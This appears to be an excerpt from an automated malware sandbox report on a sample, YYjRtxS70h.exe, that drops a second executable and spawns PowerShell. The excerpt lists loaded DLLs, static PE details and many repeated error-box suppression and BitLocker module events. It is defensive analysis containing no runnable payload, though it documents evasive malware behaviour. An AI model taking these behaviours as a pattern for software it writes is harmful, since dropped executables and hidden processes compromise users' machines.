Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: netutils.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: dnsapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: rasadhlp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: fwpuclnt.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: schannel.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: mskeyprotect.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: msasn1.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: dpapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: cryptsp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: rsaenh.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: cryptbase.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: gpapi.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeSection loaded: ncryptsslp.dll
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: YYjRtxS70h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: YYjRtxS70h.exeStatic file information: File size 13793970 > 1048576
Source: YYjRtxS70h.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: YYjRtxS70h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe
Source: YYjRtxS70h.exeStatic PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drStatic PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02B0633D push eax; ret 4_2_02B06351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75EF0 push edx; retf 4_2_06E75EF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75E40 push edx; retf 4_2_06E75E41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75F84 push ecx; retf 4_2_06E75F85
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75F0E push ecx; retf 4_2_06E75F10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75C8B push esp; retf 4_2_06E75C8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75C3B push esp; retf 4_2_06E75C3C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75DB4 push ebx; retf 4_2_06E75DB6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75D3E push ebx; retf 4_2_06E75D3F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75D1F push ebx; retf 4_2_06E75D20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E75B09 push ebp; retf 4_2_06E75B0B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E760E3 push eax; retf 4_2_06E760E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E76070 push eax; retf 4_2_06E76071
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E76045 push eax; retf 4_2_06E7604B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06E76007 push eax; retf 4_2_06E76009
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_03396348 push eax; ret 11_2_03396351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08D15681 push ss; retf 11_2_08D15682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08D15283 push 95E8C88Bh; ret 11_2_08D15288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D34277 push ebx; ret 14_2_02D342DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D36338 push eax; ret 14_2_02D36341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_02D33ACD push ebx; retf 14_2_02D33ADA
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drStatic PE information: section name: .text entropy: 6.864188260151341
Source: C:\Users\user\Desktop\YYjRtxS70h.exeFile created: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
